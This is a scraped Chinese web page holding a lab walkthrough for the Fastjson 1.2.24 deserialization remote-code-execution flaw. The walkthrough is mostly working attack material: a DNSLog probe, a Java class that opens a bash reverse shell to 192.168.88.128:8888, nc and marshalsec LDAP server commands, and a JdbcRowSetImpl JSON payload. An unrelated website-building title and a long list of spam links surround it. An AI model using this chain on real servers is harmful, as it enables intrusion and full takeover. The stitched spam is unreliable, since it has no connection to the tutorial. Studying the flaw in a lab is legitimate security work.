当前位置: 首页 > news >正文

网站建设及运营 经营范围wordpress 写php代码

网站建设及运营 经营范围,wordpress 写php代码,wordpress免费插件下载地址,建网站需要什么步骤漏洞复现环境搭建请参考 http://t.csdnimg.cn/vSaaw kali切换jdk版本请参考 Kali安装JAVA8和切换JDK版本的详细过程_kali安装jdk8-CSDN博客 漏洞原理 Fastjson提供的com.sun.rowset.JdbcRowSetImpl类下的dataSourceName方法支持传入一个RMI/LDAP源,支持远程调用。…

漏洞复现环境搭建请参考

http://t.csdnimg.cn/vSaaw

kali切换jdk版本请参考

Kali安装JAVA8和切换JDK版本的详细过程_kali安装jdk8-CSDN博客

漏洞原理

Fastjson提供的com.sun.rowset.JdbcRowSetImpl类下的dataSourceName方法支持传入一个RMI/LDAP源,支持远程调用。攻击者只需要创建一个恶意指令类(写入反弹shell等恶意命令),设置RMI/LDAP服务的远程加载指向该恶意类,即可做到远程任意命令执行

漏洞版本

fastjson<=1.2.24

漏洞验证

(1)Web访问,JSON页面

(2)BP抓包,利用DNS回显验证,DNSLog Platform

(3)修改提交方式为POST,加入以下内容,放包,DNS回显则证明漏洞存在

#val的值为DNS申请的域名Content-Type:application/json{"a":{"@type":"java.net.Inet4Address","val":"q6teka.dnslog.cn"}
}

漏洞利用

(1)创建远程加载类,攻击机创建.java文件,内容如下,并进行java编译生成class文件

#执行反弹shell,注意文件名需要和class类名称创建的一样
import java.lang.Runtime;
import java.lang.Process;public class getshell {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.88.128/8888 0>&1"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}

(2)开启攻击机HTTP服务和反弹shell端口的监听

python3 -m http.server 80
nc -lvvp 8888

(3)开启LDAP服务

#工具获取
git clone https://github.com/RandomRobbieBF/marshalsec-jar#开启LADP服务,端口6666,指定远程加载类为攻击机上的getshell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.88.128:80/#getshell 6666      

(4)回到站点,BP抓包,发送恶意数据,内容如下

Content-Type:application/json
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.88.128:6666/getshell","autoCommit":true}
}

(5)放包,getshell

http://www.yayakq.cn/news/37376/

相关文章:

  • 专业网站运营托管网站开发布局
  • 深圳小型网站建设制作网站的登录界面怎么做
  • 宣传型网站的实现技术手段手机vi设计公司
  • 为中小型企业构建网站广州天河区景点
  • 精品网站建设费用 地址磐石网络17网站一起做网店广州
  • 温州 网站建设网站开发范围
  • 阳江专业手机网站制作公司做自媒体网站
  • 重庆官方推广网站济南做网站优化价格
  • 无锡建设网站公司校园网络及网站建设
  • 未来做那些网站致富wordpress换头像不显示不出来
  • nas有域名了怎么做网站一线城市网站建设费用高
  • 国外vps做网站测速有什么做兼职的医疗网站
  • 嘉兴高端网站外贸网站空间选择
  • 青岛外贸网站建设费用专业网站设计
  • 网站系统 外贸网站建设宣传语
  • 哪里有门户网站开发公司蚌埠网站制作公司哪家好
  • 网站服务器是什么企业培训课程分类
  • 西安网站建设公司西安网络公司卖源码的网站
  • 自己怎么注册一个网站wordpress调用post的发布时间
  • 微山本地有做网站的么做外贸阿里巴巴有哪些网站
  • 网站建设捌金手指花总四ssh小型购物网站开发
  • 音乐网站还可以做唐山建设集团下岗职工网站
  • 怎么做网站商城wordpress修改链接出现404
  • 网站域名批量查询注册洛阳瀍河建设局网站
  • 重庆做网站哪个好些嘛海口装饰设计网站建设
  • 小白建站软件山西省住房和城乡建设厅网站
  • 福州市交通建设集团有限公司网站什么是优化产业结构
  • 网站建设 验收商业网站建设者
  • 深圳网站建设认准乐云践新搜索引擎优化有哪些
  • 浦口区网站建设质量推荐有哪些做的比较精美的网站